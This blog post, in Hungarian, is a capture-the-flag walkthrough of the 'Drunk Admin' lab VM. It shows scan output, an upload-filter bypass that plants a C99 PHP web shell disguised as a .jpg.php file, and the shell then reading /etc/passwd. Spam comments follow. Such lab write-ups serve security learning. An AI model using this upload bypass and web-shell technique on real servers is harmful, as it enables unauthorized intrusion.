2014. január 9., csütörtök

Drunk Admin Web Hacking Challenge - information gathering + install a backdoor shell

netdiscover

Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts                                                     

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                         

   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.100  08:00:27:3c:21:4a    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.104  08:00:27:63:94:10    01    060   CADMUS COMPUTER SYSTEMS                                                

root@kali:~# unicornscan -mT 192.168.56.104
TCP open                 ssh[   22]        from 192.168.56.104  ttl 64
Main [Error   chld.c:53] am i missing children?, oh well

root@kali:~# nmap 192.168.56.104 -pT0-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:04 CET
Nmap scan report for 192.168.56.104
Host is up (0.00039s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8880/tcp open  cddbp-alt
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)

root@kali:~# nmap -sS -sV -O 192.168.56.104 -pT22,8880

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:10 CET
Nmap scan report for 192.168.56.104
Host is up (0.00037s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
8880/tcp open  http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.26 - 2.6.35, Linux 2.6.32
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

root@kali:~# nikto -host 192.168.56.104 -port 8880
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        8880
+ Start Time:         2014-01-08 17:13:50 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze8
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie trypios created without the httponly flag
+ Server leaks inodes via ETags, header found with file /bBqXOGa0.eml, inode: 0x723b2, size: 0x33, mtime: 0x4ba515bf8ec40;4bcb127742900
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /info/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2014-01-08 17:14:02 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.104:8880/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Wed Jan  8 17:15:16 2014
URL_BASE: http://192.168.56.104:8880/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.104:8880/ ----
+ http://192.168.56.104:8880/cgi-bin/ (CODE:403|SIZE:292)                                                                

                                  
+ http://192.168.56.104:8880/image (CODE:200|SIZE:1392)                                                                                                    
...
                                  
+ http://192.168.56.104:8880/info (CODE:200|SIZE:1600)                                                                   
                                         
...
                                  
+ http://192.168.56.104:8880/upload (CODE:200|SIZE:57)                                                                   
...    
-----------------
DOWNLOADED: 13776 - FOUND: 23

http://192.168.56.104:8880/

View source:

<a href="myphp.php?id=102">PHP</a>

http://192.168.56.104:8880/myphp.php?id=102

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

...

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C1000

Try harder, you might find something here. Or not? Who knows.

http://192.168.56.104:8880/myphp.php?id=101

Linux drunkadm 2.6.32-5-686

This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1,
This server is protected with the Suhosin Patch 0.9.9.1

http://192.168.56.104:8880/myphp.php?id=108
Server Root     /etc/apache2

DOCUMENT_ROOT     /var/www
X-Powered-By     PHP/5.3.3-7+squeeze8
Set-Cookie     trypios=nop; expires=Wed, 08-Jan-2014 17:28:43 GMT

http://192.168.56.104:8880/myphp.php?id=116

APACHE_RUN_USER     www-data
APACHE_LOG_DIR     /var/log/apache2

http://192.168.56.104:8880/myphp.php?id=132

PHP Variables

http://192.168.56.104:8880/upload

upload a jpg


HTTP Live Header:

Set-Cookie: trypios=394659692a460258b45a99f1424ea357; expires=Wed, 08-Jan-2014 18:42:49 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=394659692a460258b45a99f1424ea357

source:

<img src="images/394659692a460258b45a99f1424ea357.jpg" >

http://192.168.56.104:8880/images/394659692a460258b45a99f1424ea357.jpg

Cookie: trypios=uploader

--
php encoder here:
http://xploitaday.komodin.org/tools/php-encoder/

download  c99_preg_entropy.php

cp c99_preg_entropy.php a.jpg.php

http://192.168.56.104:8880/upload  

a.jpg.php

Set-Cookie: trypios=922def33ac603be53b99c558f73c4db7; expires=Wed, 08-Jan-2014 18:58:28 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=922def33ac603be53b99c558f73c4db7

http://192.168.56.104:8880/images/922def33ac603be53b99c558f73c4db7.php

I got a C99 php shell on the system.

get /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/false
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
mysql:x:104:107:MySQL Server,,,:/var/lib/mysql:/bin/false


ls -al /home/bob

total 28
drwxr-xr-x 4 bob  bob  4096 Mar  6  2012 .
drwxr-xr-x 3 root root 4096 Mar  3  2012 ..
-rw-r--r-- 1 bob  bob   220 Mar  3  2012 .bash_logout
-rw-r--r-- 1 bob  bob  3184 Mar  3  2012 .bashrc
-rw-r--r-- 1 bob  bob   675 Mar  3  2012 .profile
drwxr-xr-x 2 root root 4096 Mar  6  2012 Documents
drwxr-xr-x 3 bob  bob  4096 Mar  6  2012 public_html

http://192.168.56.104:8880/~bob/

http://192.168.56.104:8880/~bob/encrypt.php

I didn't find any bug for privilege escalation in this system...

Hints from here: http://www.sec-track.com/solucionario-del-reto-security-challenge-ctf-web-por-nonroot-ganador-del-reto

2 megjegyzés:

  1. If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (even if they're dating somebody else now) you got to watch this video
    right away...

    (VIDEO) Text Your Ex Back?

    VálaszTörlés
  2. BlueHost is ultimately one of the best website hosting company for any hosting plans you need.

    VálaszTörlés